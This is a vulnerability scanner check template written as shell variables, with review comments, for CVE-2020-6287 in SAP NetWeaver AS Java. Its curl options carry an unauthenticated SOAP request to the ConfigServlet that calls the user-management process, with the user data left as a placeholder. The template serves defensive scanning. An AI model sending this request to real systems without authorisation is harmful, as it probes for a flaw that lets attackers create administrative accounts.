# Scanner check template: a set of shell variable assignments describing one
# HTTP probe for CVE-2020-6287. The script that sources this file and builds
# the request is not shown here, so how each variable is consumed is an
# assumption to confirm against that script.
AUTHOR='@xer0dayz'
# Human-readable finding title reported for a hit.
VULN_NAME='CVE-2020-6287 - Create an Administrative User in SAP NetWeaver AS JAVA'
# Path requested on the target; the request below carries no credentials.
URI="/CTCWebService/CTCWebServiceBean/ConfigServlet"
METHOD='POST'
# Presumably the string searched for in the response to declare a finding.
# NOTE(review): "CTCWebServiceSi" is also the service namespace used in the
# request body, so a match most likely shows that the endpoint answered, not
# that the host is unpatched. Treat hits as "exposed, needs verification" and
# check the patch level for CVE-2020-6287 before rating the finding.
MATCH="CTCWebServiceSi"
SEVERITY='P1 - CRITICAL'
# Extra curl arguments: empty User-Agent, follow redirects (-L), silent (-s),
# and --insecure, which disables TLS certificate verification for the probe.
# NOTE(review): the value is double-quoted, and the unescaped double quotes
# around the two xmlns attribute values close and reopen the shell string, so
# the assigned value holds those attribute values WITHOUT quotes (the XML as
# stored is not well-formed). Confirm whether the consumer depends on this.
# NOTE(review): {{base64('data')}} is not shell syntax and stays literal in
# the value unless the consuming script substitutes it - verify.
CURL_OPTS="--user-agent '' -L -s --insecure -H 'Content-Type: text/xml; charset=UTF-8' --data '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('data')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>'"
# No follow-up commands are defined for this check.
SECONDARY_COMMANDS=''
# -i: presumably passed to grep so the MATCH comparison is case-insensitive.
GREP_OPTIONS='-i'